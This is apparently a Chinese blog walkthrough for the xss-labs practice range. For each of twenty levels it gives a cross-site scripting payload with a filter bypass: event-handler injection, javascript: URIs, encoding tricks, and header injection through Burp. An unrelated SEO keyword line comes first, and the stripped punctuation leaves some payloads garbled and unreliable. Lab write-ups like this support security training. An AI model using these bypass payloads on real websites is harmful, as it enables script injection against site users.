西安手机网站制作公司,深圳福田网站建设专业公司,wordpress 标签云,国家时事新闻每一关的方法不唯一#xff1b;可以结合源码进行分析后构造payload#xff1b;
通关技巧#xff08;四步#xff09;#xff1a;
1.输入内容看源码变化#xff1b;
2.找到内容插入点#xff1b;
3.测试是否有过滤#xff1b;
4.构造payload绕过 第一关
构造paylo…每一关的方法不唯一可以结合源码进行分析后构造payload
通关技巧四步
1.输入内容看源码变化
2.找到内容插入点
3.测试是否有过滤
4.构造payload绕过 第一关
构造payload:namescriptalert()/script 第二关
构造payload: οnclickalert() 第三关
构造payload: οnclickalert() 第四关
构造payload οnclickalert() 第五关
构造payload:a hrefjavascript:alert()123/a// 第六关
构造payload: Onclickalert() 第七关
构造payload: oonnclickalert() 第八关
在url中构造payload:javascr%09ipt:alert()
也可以用html实体编码替换script中的一个字符来绕过方法很多不演示 第九关
构造payload:javascri#112;t:alert(http://) 第十关
构造payloadt_sort οnclickalert() type 第十一关
通过bp抓包修改referer: οnclickalert() type 第十二关
通过bp抓包修改User-Agent: οnclickalert() type 第十三关
通过bp抓包修改Cookie: user οnclickalert() type 、 第十四关坏了直接略过
iframe标签:规定一个内联框架用于显示外部引入网站的信息引入网站内容会被嵌套进当前页面
通过查看源码发现利用了iframe标签源码中没有任何注入点那么注入点只能是引入的网站中可以网站打不开看了大佬的wp发现是向引入的网站上传一张带有xss恶意代码的图片通过加载是的图片嵌入到本地触发弹窗(exchangeable image file format)exif xss
大佬的wpxss-labs靶场-第十四关 第十五关
构造payload:srclevel1.php?name/h2h2 οnclickalert()123 第十六关
构造payload:keywordinput%0Aοnclickalert()
对空格进行实体编码了需要空格绕过 第十七关(看了大佬的wp)
查看源码发现对输入信息进行了预定义字符转换但是输出的语句中有漏洞点 构造payload:arg01aarg02%20οnmοuseοveralert(123)%20typetext%20
然后鼠标移到不支持此插件的图片上方就通过了edge可以显示此图片火狐图片也没法加载 第十八关
源码中验证和输出和第十七关一样
直接构造payload:arg01aarg02%20οnmοuseοveralert(123)%20typetext%20 第十九关
这关就不能投机取巧了真的考察flash的xss漏洞了由于浏览器不支持flash看不到提示的关键信息所以就略过了现在flash基本遇不到了就不深究了
payload:?arg01versionarg02a hrefjavascript:alert()here/a
推荐大佬的wpXSS-labs Level 19 Flash XSS_xsf03.swf-CSDN博客 第二十关
同上
payload:?arg01idarg02xss\))}catch(e){alert(1)}//%26width123%26height123
推荐大佬的wpXSS-labs Level 20 Flash XSS_xss-labs level20-CSDN博客 10